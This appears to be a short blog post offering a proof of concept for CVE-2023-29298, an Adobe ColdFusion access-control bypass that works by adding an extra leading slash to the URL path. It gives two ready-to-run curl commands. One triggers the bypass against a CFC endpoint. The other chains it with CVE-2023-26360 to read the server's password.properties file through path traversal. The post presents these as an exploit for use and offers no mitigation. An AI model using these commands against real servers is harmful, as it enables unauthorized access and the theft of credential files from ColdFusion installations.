CVE-2023-29298 Adobe Poc

Prapattimynk, Wednesday, July 12, 2023

Adobe ColdFusion Access Control Bypass
As the attacker-controlled URL path is tested with a call to

java.lang.String.startsWith

, this access check can be bypassed by inserting an additional character at the start of the URL path, which will cause the

startsWith

check to fail but will still allow the underlying servlet to be able to resolve the requested resource. The character in question is an additional forward slash.

⚠️The access control bypass in CVE-2023-29298 can also be leveraged to assist in the exploitation of an existing ColdFusion vulnerability(for example – CVE-2023-26360, which allows for both arbitrary file reading as well as RCE). We can chain CVE-2023-29298 to CVE-2023-26360 and bypass the access control in order to reach a CFC endpoint and trigger the vulnerability

💾Trigger vulnerability(CVE-2023-29298) using the cURL command:

c:\> curl -v -k http://172.23.10.174:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

💾Chain CVE-2023-29298 to CVE-2023-26360 and bypass the access control in order to reach a CFC endpoint and trigger the vulnerability:

c:> curl -v -k http://172.26.181.162:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"

Recommended for You

You may also like

1 Comments

  1. 4 months ago

    After I initially commented I appear to have clicked the -Notify me when new comments are added- checkbox and now whenever a comment is added I recieve four emails with the exact same comment. Is there an easy method you can remove me from that service? Thanks!

Your email address will not be published. Required fields are marked *

Next Post X
Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.